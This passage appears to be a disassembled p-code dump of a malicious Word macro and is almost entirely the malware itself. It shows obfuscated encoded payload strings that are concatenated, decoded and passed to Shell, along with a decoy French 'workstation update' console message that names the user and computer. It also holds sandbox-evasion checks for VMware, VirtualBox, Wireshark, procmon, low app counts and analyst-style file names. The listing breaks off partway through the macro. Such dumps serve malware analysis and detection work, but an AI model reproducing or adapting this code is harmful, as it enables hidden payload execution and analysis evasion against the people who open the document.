' 	LitStr 0x01F4 "OMm1WEG35CB10cfBkZepJ38LUfkeK4HwnJPU7plwIw2+1r6eiWTFSogVe1LHUPBjbzeKtlPbY1CKWErjH8U=PEnxK1NheiLSSSdgZMaITxoR1FNgD5xmJYzTZddXYE3gIlHJWC3ab9K6O7=LbMbdzib9s4PLc6CzVVMm7gjsab28rA7J24NG4EDIduZ1QjnYOBI/8e=8MNWiQffy1rXZiLqoSOQDVhLHhyBlvReWclPSlxk2GE8sHl0GPZr/zEhhngLccSdsVCaUISoTVwO=DNe9J0zFoQhXVdNzGLZls33m29xL27LBbMR1zwdTfZNL86/88sMg39jcab2jBAzv24qa4YqugK21urnqJVICTe=OENFbQfbj1h6QiLXNSzeDVD8k7iB3YzeJvYSG1xI6GM1eHN4D7/f/FlcMzMLVandEEQf4ISUiVsmND3UmUHNFptdwKGNZ/1ZP93UKU9Jp29nGb01+zvcTQxNLfg/3VsM8UgjVFpt3"
' 	St EKKdVAjzttW 
' Line #75:
' 	LitStr 0x01F4 "BANs2OSq7k0u1=0f3mn+HgIj2jjPCNM+QfRN12fQs/8NjTXRyvL47BB9vJeRloHl1xNlGi7eUlsDJ/h9fgsn6MLFanlyEQ1KISGWVsvMVnem8QYH6PFAvtNE/1xO93dAU6xb25szSV7+wjf1CSNQr9/fvsdb79i7FH2VBbNje26qMavs1=0KHmnNdgOa2jf0CpmzQ1rN1pCQ0ub7k2X7VXL=gEHslzKBlcPp1UWDGGce5ftR/xhv6dspqv/8anj1EGfhIoCWOVjMbFLUfuYJgPFtvtBqg18M93iHU1kseqNzNIfIuYfZ5qNtp9vElv2q7kMvFM0Dlk7jcIUi4xv+pk0cUcnPRgAl2IjyCOxKRacNW94XHP8BGnXuup/zJEtvlj4gle/1P+/DTEfeA8gfPbhLK99QfMxAadl1EkvinniWpMm+=5LcJuYNMPJvl3Y/gGZO9diSd1vsO5=8FMfo9YfwCSBkr9i2l4gn7/3AFQtDhJqlT2UX"
' 	St cTdzQWOUWEEVexjiF 
' Line #76:
' 	LitStr 0x01F4 "Lbvve=yPhmDUR8Ih2IwnCmmKS9v7eW4ADg8TwngYeX7UJgHslgJdYMH1wBCRiEftt4gBrx=oK9N6fMUHamHA04git0oBNwmdAZLPgu+NZqdblO3og/1VNG3S3dKY2y=q+vfXW9r7sSYhr6p5l3=IKewA6M9R5d73e4Um4bDHd=MXhx8RRK97erRngzMObzfB6W4D8fiyS4fpenw1Jg+jYNDdzoP1Y1Cd1Bfq24YrPbnHK6MefheSa17AFwa3gro+xwm7=5/eJu09Z3RXldOggChVsEwc5dK0O7=gbMr/zYdTs0B6rkkzlhgIs8rgAp27mA75247t4bbHd=6phHXYJVK7h8f=pwWxYOfSlr6KiWbpSogle1pHJRSjtjeK/oPvlxCLiBrsH8tePym/Klgh62wSEwGAmQaInSoqAwN5D58aJY7TZwBXYcDgIgZJ5C3yvgKwO7yIbMlxz=b9sTDLcpzzdVMmbdjqnp2FcL7624EO4b7kdUp1"
' 	St TkvnhzpvknoLxyTmn 
' Line #77:
' 	LitStr 0x01F4 "QTzYOKI/ee=8p2WvUfrw1rx8iWLNSo0D/p7HcyBlhOelqYPnlxkEGEv8H+lDPYa/zghhnILcDHdskQaJISoGVwjXD5U=JjdFoQhXViYz/1Zlq33h3gxe27f9bIDwz6cTbrSLfd/8qjMgG9j9XpGUBA5A24oL4BkugU819jnqOgIy5j=xENFQQfdp1h68iLINSsXDQQ8k8iB3vJeYloPL1xLGGMdeHhrDBan/cFshTtLVwSd=m5fEISuOV=gNDKemUzYF3nFwvGNiCLZWVtU3U92m27ESbgY+GHbTK+YVq1/qqsM/tg3LFp+DBECs2O5q7I0uMc0fyHnMJgIjcejKCNpwQuro12CQhI=NJzeDq+LJ8EBglztglo501BCVGybeUasDFbh/9gsnSML4zHl=EQMVI0JDVIWMFB7mhQYFIqFVl3NdxKZA93bBU6Kb2ZrzSVY+kwf1lqNPqd/Evsd779izFHaGByNjDRUqLbvs1c0KXcnfgVOF"
' 	St fXhXNVEleO 
' Line #78:
' 	LitStr 0x01F4 "2jfYC/oCQ7bNPmfQTm87m4XfqvLFfBH1lzW3lcPP1sLDtg=ewhgRFxh3T9siqvL+anaEEwcVITCWON3Mbh8UsjYJSPFRl3BDg1H/938HUrKs2qNzRMf+w9frAqNUIgvolvp4768AFM+DlC5jhHzqHxvE6c0ThmnRRgV12jE6CAuKRgcN4r4XTg8W=IXkupXuJESFlzcgle51PICD=FvTpagTYbh0T9MWfMwAanh1EK6iILQWxwmM8ZL/JuYiTPIWl3P8g1=t9bbSU3/s67=zttfNzYf/sSBur9iRlSh/7krAm7tDAb7lT2UIVxvt/k0OhmOTR8Al2MNnxreKYav7g94A0W88+4XEeXOyJMWFlrDdlUb1WGIRyPfB58g1Jx=hK9cufIUAaudA04UiB0oB1wmy=5Ljgu+DZqcOlp+3gT6VWRmSvsuYcn=Pfvf5w9rosSYBrkpSlLdIlEiA6Q9R3k7374UGHx5Hd=JlhLwRRTi7eeBng/WO"
' 	St NJqYJJYErv 
' Line #79:
' 	LitStr 0x01F4 "MVfBWr408fi9S4eVeuL1JrTjYJ6ddlPfeACT5Pf7B4YdPbaCKkMhf0xS4HEA/wa3=roFUFmjD5XdJuwFZdValODg2yZVacwck9KM77=r5MNwzYcEsTPKr/7zlmUIGgjgmo2T3A7H247t4bGndK2PhQzYJgK7O7==5NWBZOf+YW60iWTmSTQGeDiHJR7jtjeKKbPbWxCL2BPiH8rpPbG/KkOhei7Sk/dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3IkdKH8yjEbM7Dzib9s4WLc6CzVVMIt9juAs2urACI24wH4EGZdn61QmbYOhA/02=f5NWdUfrA1rdZiCVNSJdD//CHWF+lYzelboPsR1kRGEdSH+YDPan/z/XhUgLcendLEQauqqR0VwQTDN79J50FZkFXbEYzGgZ6hG3TU9xO27LIb8b+zXbTsLPLp8i8hvMKs9j3FpGMBAxv2TSq4YCugk21DrnqODIo2j=/ENWbQfdw1hPR"
' 	St hDXThtgUsEh 
' Line #80:
' 	LitStr 0x01F4 "imzNH2lDkvLkNiB3/RefdYSA1xI6GgYeHTsDBbN/fkcM65LaKndjFQfWISiDVsmNDv/mN90F3tdwqGNYb1Zz93UqU9Qk27iSbVd+GifTC4NVG9/YYvMNG93QFpLGBz6022Sq7avu12JfHrn9HgIR8ej4CNu5Qu1o1bQQhCqNmqeRyvLJ7BB9tztMloAR1x4VGg=eUTrDYuh9F1sCSMLdKnlbEQMVI0vDVI+MDnem8jYHoWFpdtNqg1Z093mTUkxD2eNzS27+kxf1frN7Ld/pvsdN79BzFprlBdCje26qzBmswU0ZXcncoVOi2jfYCpoKQzcN4VQQ8g87H2XMCXL/JEBTlzwjlcH11+ODTJ=ewftRF/hs=gsVxM/QanGOEwRVIrTWOTQMqBLmL7YwTPFzvt8pg1hp9pwOUldse78z53vIkxfZgqNUfgvRlv=n763AFEoD3K6j64UqkYv+zk0AUcnvRgvH2xMxCiMKQ3fNlq4QYf8v+4Xr"
' 	St rkqdOMkxmnSp 
' Line #81:
' 	LitStr 0x01F4 "upXLJEUFljeBl5L1PZLDCvveg4gfYbhH9g9XfMeSanhvEF1inx7WxGmMQ5L2L7YWZqF3l3gWg1=Y9D3Sdelsce=zftfAA9fHsSBWr9GolvWI7kVAm7rDlQqjTnUPBbvF/k0lhmSKR80S21jnCZWKUav7wq4zSW8gwnXIeXx1JMUsle6dYoX1W/IRCiftgagkPb=oK9XHfMUAaDEA0E1izoUWuFmO=5Lxf7+IZqNjlpAfgThV9jwS+1KY7n=JtvfuzYrSsSwur6V5l4WIl1HAnx9D5L7i0nUZzbv4d=ThhLzrRAO72o=ngJMOZVfqg94hHf8fS4AGeucHJgOjzKvdzbPf49Cd8PfoH8g=PbnuK9OQfSwSaJFAZ1aigSorzwmuvZX=JuwTZ3NXlD+gglHVNC3c+9KIRy=QbMrzzYdUsSOLr17zYLYIKEjABs2dlA7nO4Q44b04d=c1hjOYJT87D7==x4WRMVfs1r4UiWVmSTeVeuSHNg+j"
' 	St WauMdbKKmxueesFlTRlH 
' Line #82:
' 	LitStr 0x01F4 "adedSoPElxC6iBr7H8rGPEA/K/3hfs8SkmdgkCa6MqodVwNGD5hfJudmZdtXY=AgbyZJB33V3gKX8yjUbMc7zib9soBLrsizzZMmsdjL5b2BBACw24ER4bfZdqY1QHWYOXA7Te=z72WyUffr1rCGiWFESuXD/hiHhYBlSzeu/lPAY1C=GE7LHlgVPBn/zkchUgLcamduFQaFRSReVwQsD53GJj+FokFXaCNgwKZ6N33AegxL27LIb8fwzZ2Tb=WLtkiz8sM7K9jRabGIBAg=2olE4v9ugfp1lI1Y8gIBej=e72FNQfvw1h6/iIiNHHeD+nLkaiBizzeBtoSM1xYaGgf3HTUDB58/+kcMetLq4ndym5faISUVV=jXD3UmNBNF3odwKCN9KLZvVt3KU9/e27nzb01+GHbTK+YLU9/3VsM279uCFpLGBE5j2Omq7LeusmJ1UHnooVIm2j=pCNolQfTN1CPQhgqNJ2XDy+LTsPBnvJdnlobG"
' 	St wxpLHjNnjVZ 
' Line #83:
' 	LitStr 0x01E4 "1xWDGU2eUa5D7va/tgsKxML2anRfEQ6uIS/iVROMVa7mF80HkWF8cGNag1Q493bSU9db2ZfzbJf+kxf1rxNQp9/5tvo=79MiFH+VBd6j2x4qzYvsec0KlcnboVOU2jgiC/WCQzbNPh4QSC87m4XT/XL/JEB6lzKMlc9h1ILDGGce5NgRf/hS8gsiqvL+anj7EGg2In7WV7mMqvLU74YK3qFmt3B1g1hV938OU8lsenBzNif+v9frCSNtr9vllvS/76jiFaoDBW7jO2Ui//v7e=0hHm8bRgVS2jE6CApKQ3fNmq4XiP82+4XG8XLbJEFsljtBlbR1PZLDCifT58gMf/he9gsLfM80ad71EMRinLQWzrg+VuLOF7Y03qJil3RDgGWt9iHSUsusDNfz1vfN9YfcAqNsr9p5lShI7/1AmO2Drz7jcnUUHxvad=ykhmpBRgCl2Ipn5AmKS3fNe94eHf8D+4gMeXc8JCMQ"
' 	St pUCAotjVuCQBfkftGrwC 
' Line #84:
' 	Ld EKKdVAjzttW 
' 	Ld cTdzQWOUWEEVexjiF 
' 	Add 
' 	Ld TkvnhzpvknoLxyTmn 
' 	Add 
' 	Ld fXhXNVEleO 
' 	Add 
' 	Ld NJqYJJYErv 
' 	Add 
' 	Ld hDXThtgUsEh 
' 	Add 
' 	Ld rkqdOMkxmnSp 
' 	Add 
' 	Ld WauMdbKKmxueesFlTRlH 
' 	Add 
' 	Ld wxpLHjNnjVZ 
' 	Add 
' 	Ld pUCAotjVuCQBfkftGrwC 
' 	Add 
' 	St JSYKsfbkulFLwzF 
' Line #85:
' 	LitStr 0x0052 "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
' 	St ilCuylucYGMVsPGKnYyE 
' Line #86:
' 	Ld JSYKsfbkulFLwzF 
' 	Ld ilCuylucYGMVsPGKnYyE 
' 	ArgsLd yVUjdHcKUhdsSMTTyQ 0x0002 
' 	ArgsLd fCIvqJuUQOrDpoAFFD 0x0001 
' 	Ld StrConv 
' 	ArgsLd kQZqdoRefXB 0x0002 
' 	Paren 
' 	ArgsCall Shell 0x0001 
' Line #87:
' 	LitStr 0x00AB "cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !"
' 	Ld vbNormalFocus 
' 	ArgsCall (Call) Shell 0x0002 
' Line #88:
' Line #89:
' 	EndSub 
' Line #90:
' Line #91:
' 	FuncDefn (Public Function checkApps() As Boolean)
' Line #92:
' Line #93:
' Line #94:
' 	LitVarSpecial (False)
' 	St d 
' Line #95:
' 	LitStr 0x0006 "vmware"
' 	LitStr 0x0007 "vmtools"
' 	LitStr 0x0004 "vbox"
' 	LitStr 0x0010 "process explorer"
' 	LitStr 0x000D "processhacker"
' 	LitStr 0x0007 "procmon"
' 	LitStr 0x000C "visual basic"
' 	LitStr 0x0007 "fiddler"
' 	LitStr 0x0009 "wireshark"
' 	ArgsArray Array 0x0009 
' 	St tns 
' Line #96:
' 	SetStmt 
' 	LitStr 0x0017 "winmgmts:\\.\root\cimv2"
' 	ArgsLd GetObject 0x0001 
' 	Set ws 
' Line #97:
' Line #98:
' 	Dim 
' 	VarDefn names
' Line #99:
' 	OptionBase 
' 	Ld WordBasic 
' 	ArgsMemLd AppCount 0x0000 
' 	Redim names 0x0001 (As Variant)
' Line #100:
' Line #101:
' 	Ld names 
' 	Ld WordBasic 
' 	ArgsMemCall AppGetNames 0x0001 
' Line #102:
' Line #103:
' 	StartForVariable 
' 	Ld n 
' 	EndForVariable 
' 	Ld names 
' 	ForEach 
' Line #104:
' 	StartForVariable 
' 	Ld tn 
' 	EndForVariable 
' 	Ld tns 
' 	ForEach 
' Line #105:
' 	Ld n 
' 	ArgsLd LCase 0x0001 
' 	Ld tn 
' 	FnInStr 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #106:
' 	LitVarSpecial (True)
' 	St d 
' Line #107:
' 	EndIfBlock 
' Line #108:
' 	StartForVariable 
' 	Next 
' Line #109:
' 	StartForVariable 
' 	Next 
' Line #110:
' Line #111:
' 	Ld d 
' 	IfBlock 
' Line #112:
' Line #113:
' 	LitVarSpecial (True)
' 	St checkApps 
' Line #114:
' Line #115:
' 	ElseBlock 
' Line #116:
' Line #117:
' 	LitVarSpecial (False)
' 	St checkApps 
' Line #118:
' 	EndIfBlock 
' Line #119:
' Line #120:
' 	EndFunc 
' Line #121:
' Line #122:
' 	FuncDefn (Public Function checkAppCount() As Boolean)
' Line #123:
' Line #124:
' 	Ld WordBasic 
' 	ArgsMemLd AppCount 0x0000 
' 	LitDI2 0x0032 
' 	Lt 
' 	IfBlock 
' Line #125:
' Line #126:
' 	LitVarSpecial (True)
' 	St checkAppCount 
' Line #127:
' Line #128:
' 	ElseBlock 
' Line #129:
' Line #130:
' 	LitVarSpecial (False)
' 	St checkAppCount 
' Line #131:
' 	EndIfBlock 
' Line #132:
' Line #133:
' 	EndFunc 
' Line #134:
' Line #135:
' 	FuncDefn (Public Function checkPreciseFileName() As Boolean)
' Line #136:
' Line #137:
' Line #138:
' 	LitVarSpecial (False)
' 	St badName 
' Line #139:
' Line #140:
' Line #141:
' 	Ld ActiveDocument 
' 	MemLd Name 
' 	LitStr 0x000B "Pafish.docm"
' 	Ne 
' 	IfBlock 
' Line #142:
' 	LitVarSpecial (True)
' 	St badName 
' Line #143:
' 	EndIfBlock 
' Line #144:
' Line #145:
' 	Ld badName 
' 	IfBlock 
' Line #146:
' Line #147:
' 	LitVarSpecial (True)
' 	St checkPreciseFileName 
' Line #148:
' 	ElseBlock 
' Line #149:
' Line #150:
' 	LitVarSpecial (False)
' 	St checkPreciseFileName 
' Line #151:
' 	EndIfBlock 
' Line #152:
' Line #153:
' 	EndFunc 
' Line #154:
' Line #155:
' 	FuncDefn (Public Function checkFilenameHash() As Boolean)
' Line #156:
' Line #157:
' Line #158:
' 	LitStr 0x0010 "0123456789abcdef"
' 	St hexchars 
' Line #159:
' Line #160:
' 	LitDI2 0x0000 
' 	St c 
' Line #161:
' Line #162:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd Name 
' 	FnLen 
' 	For 
' Line #163:
' 	Ld ThisDocument 
' 	MemLd Name 
' 	ArgsLd LCase 0x0001 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St s 
' Line #164:
' Line #165:
' 	Ld s 
' 	Ld hexchars 
' 	FnInStr 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #166:
' 	Ld c 
' 	LitDI2 0x0001 
' 	Add 
' 	St c 
' Line #167:
' 	EndIfBlock 
' Line #168:
' Line #169:
' 	StartForVariable 
' 	Next 
' Line #170:
' Line #171:
' 	Ld c 
' 	Ld ThisDocument 
' 	MemLd Name 
' 	FnLen 
' 	LitDI2 0x0005 
' 	Sub 
' 	Paren 
' 	Ge 
' 	IfBlock 
' Line #172:
' 	LitVarSpecial (True)
' 	St checkFilenameHash 
' Line #173:
' Line #174:
' 	ElseBlock 
' Line #175:
' Line #176:
' Line #177:
' 	LitVarSpecial (False)
' 	St checkFilenameHash 
' Line #178:
' 	EndIfBlock 
' Line #179:
' Line #180:
' 	EndFunc 
' Line #181:
' Line #182:
' 	FuncDefn (Public Function checkFilenameBad() As Boolean)
' Line #183:
' Line #184:
' Line #185:
' 	LitVarSpecial (False)
' 	St badName 
' Line #186:
' 	LitStr 0x0007 "malware"
' 	LitStr 0x0005 "myapp"
' 	LitStr 0x0006 "sample"
' 	LitStr 0x0004 ".bin"
' 	LitStr 0x0005 "mlwr_"
' 	LitStr 0x0007 "Desktop"
' 	ArgsArray Array 0x0006 
' 	St badNames 
' Line #187:
' Line #188:
' Line #189:
' 	StartForVariable 
' 	Ld n 
' 	EndForVariable 
' 	Ld badNames 
' 	ForEach 
' Line #190:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ArgsLd LCase 0x0001 
' 	Ld n 
' 	FnInStr 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #191:
' 	LitVarSpecial (True)
' 	St badName 
' Line #192:
' 	EndIfBlock 
' Line #193:
' 	StartForVariable 
' 	Next 
' Line #194:
' Line #195:
' Line #196:
' 	Ld badName 
' 	IfBlock 
' Line #197:
' Line #198:
' 	LitVarSpecial (True)
' 	St checkFilenameBad 
' Line #199:
' 	ElseBlock 
' Line #200:
' Line #201:
' 	LitVarSpecial (False)
' 	St checkFilenameBad 
' Line #202:
' 	EndIfBlock 
' Line #203:
' Line #204:
' 	EndFunc 
' Line #205:
' Line #206:
' 	FuncDefn (Public Function checkTasks() As Boolean)
' Line #207:
…